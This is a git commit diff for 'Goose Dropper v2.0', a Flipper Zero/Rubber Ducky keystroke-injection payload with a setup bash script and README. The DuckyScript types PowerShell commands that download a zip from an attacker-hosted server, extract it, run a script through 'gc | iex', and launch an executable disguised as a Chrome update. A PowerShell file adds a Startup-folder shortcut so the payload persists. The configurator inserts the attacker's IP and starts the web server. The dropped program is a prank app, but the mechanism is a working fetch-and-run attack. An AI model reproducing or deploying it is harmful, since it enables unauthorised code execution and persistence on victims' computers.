Dropper v2.0
This commit is contained in:
Fr3ki
@@ -4,9 +4,9 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip
|
||||
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
|
||||
ENTER
|
||||
DELAY 5000
|
||||
DELAY 8000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
|
||||
@@ -14,5 +14,10 @@ ENTER
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
|
||||
ENTER
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
|
||||
ENTER
|
||||
|
||||
@@ -0,0 +1,6 @@
|
||||
$WScriptShell = New-Object -ComObject WScript.Shell
|
||||
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
|
||||
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
|
||||
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
|
||||
$Shortcut.TargetPath = $TargetFile
|
||||
$Shortcut.Save()
|
||||
@@ -1,23 +1,27 @@
|
||||
======= Goose Dropper ========
|
||||
**======= Goose Dropper v2.0 ========**
|
||||
|
||||
This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose on a Windows PC.
|
||||
This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
|
||||
|
||||
------------------------------------------------------------------------------------------------------
|
||||
|
||||
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
|
||||
|
||||
1) Replace the YOUR_IP value in GooseDropper.txt with your IP
|
||||
1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
|
||||
|
||||
2) Download Desktop Goose and extract it, rename the DesktopGoose v.031 from inside the zip to Update
|
||||
|
||||
3) Re-ZIP the Update directory and name it Chrome_Updater.txt
|
||||
|
||||
4) Start some form of simple webserver/fileshare on port 1337
|
||||
|
||||
5) Copy to your Flipper or Rubber-Ducky and PWN!
|
||||
2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
|
||||
|
||||
Important Notes:
|
||||
3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
|
||||
|
||||
4) Re-ZIP the Update directory and name it Chrome_Updater.txt.
|
||||
|
||||
5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
|
||||
|
||||
6) Copy to your Flipper or Rubber-Ducky and PWN!
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------
|
||||
|
||||
**Important Notes:**
|
||||
|
||||
Ensure configuration is run while on the same network as your target, re-configure with each new network.
|
||||
|
||||
Currently a reboot will kill the process, however persistance is being worked on.
|
||||
|
||||
All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
|
||||
|
||||
@@ -1,15 +1,44 @@
|
||||
#!/bin/bash
|
||||
|
||||
#Grab your local IP to add to the payload
|
||||
SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
|
||||
#Determine the source of the DesktopGoose download
|
||||
echo "1) Local Webserver | 2) Persistant URL"
|
||||
|
||||
read -p "Select a download source [1/2]: " DL
|
||||
|
||||
if [ "${DL}" == "1" ];
|
||||
then
|
||||
echo "Grabbing your IP"
|
||||
|
||||
#Grab your local IP to add to the payload
|
||||
SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
|
||||
|
||||
#Add your IP to the payload
|
||||
sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
|
||||
|
||||
sleep 5s && clear
|
||||
|
||||
elif [ "${DL}" == "2" ];
|
||||
then
|
||||
#Get your URL
|
||||
read -p "Enter your URL: " SRC
|
||||
|
||||
#Add your URL to the payload
|
||||
sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
|
||||
|
||||
#Remind users to have the zip ready
|
||||
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
|
||||
|
||||
sleep 5s && clear
|
||||
|
||||
else
|
||||
echo "Please enter a valid selection"
|
||||
exit
|
||||
|
||||
fi
|
||||
|
||||
#Check if Desktop Goose is present in this directory
|
||||
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
|
||||
|
||||
#Add the IP to the payload
|
||||
sed -i "s/YOUR_IP/$SRC/" GooseDroper.txt
|
||||
|
||||
#Check
|
||||
if [ "${GOOSE}" == "" ];
|
||||
then
|
||||
echo "Desktop Goose is not present in this directory, download it, or move it here"
|
||||
@@ -18,16 +47,36 @@ then
|
||||
else
|
||||
unzip "Desktop Goose v0.31.zip"
|
||||
mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
|
||||
mv PersistentGoose.ps1 Update/
|
||||
zip -r Chrome_Update.zip Update
|
||||
rm -rf "Desktop Goose v0.31"* Update
|
||||
read -p "Configuration finished! Start python webserver now? [Y/N]" START
|
||||
clear
|
||||
fi
|
||||
|
||||
read -p "Configure Persistence? [Y/N]: " PERSIST
|
||||
|
||||
if [ "${PERSIST,,}" == "n" ];
|
||||
then
|
||||
sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
|
||||
else
|
||||
break
|
||||
fi
|
||||
|
||||
if [ "${DL}" == "1" ];
|
||||
then
|
||||
clear
|
||||
read -p "Configuration finished! Start python webserver now? [Y/N]: " START
|
||||
clear
|
||||
else
|
||||
clear
|
||||
break
|
||||
fi
|
||||
|
||||
if [ "${START,,}" == "y" ];
|
||||
then
|
||||
echo "Starting Server... Happy PWNing! (don't be a skid)"
|
||||
python3 -m http.server 1337 && echo "PWNED!"
|
||||
else
|
||||
clear
|
||||
echo "Server not started, thank you!"
|
||||
echo "Finished... Happy PWNing (don't be a skid)!"
|
||||
fi
|
||||
|
||||
Binary file not shown.
@@ -0,0 +1,23 @@
|
||||
REM TITLE GooseDropper
|
||||
REM AUTHOR Fr3ki
|
||||
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
|
||||
ENTER
|
||||
DELAY 8000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
|
||||
ENTER
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
|
||||
ENTER
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
|
||||
ENTER
|
||||
@@ -0,0 +1,6 @@
|
||||
$WScriptShell = New-Object -ComObject WScript.Shell
|
||||
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
|
||||
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
|
||||
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
|
||||
$Shortcut.TargetPath = $TargetFile
|
||||
$Shortcut.Save()
|
||||
Binary file not shown.
@@ -0,0 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
cp PersistentGoose.ps1.bk PersistentGoose.ps1
|
||||
cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
|
||||
cp GooseDropper.txt.bk GooseDropper.txt
|
||||
rm Chrome_Update.zip
|
||||
Reference in New Issue
Block a user